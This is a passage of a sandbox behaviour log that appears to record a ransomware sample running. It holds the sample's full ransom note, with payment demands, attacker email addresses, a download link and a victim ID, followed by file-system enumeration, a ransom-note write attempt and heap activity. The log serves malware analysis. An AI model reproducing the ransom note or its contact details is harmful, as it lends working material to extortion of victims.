files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.741] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.741] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.741] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.741] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.741] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.741] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.742] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.747] 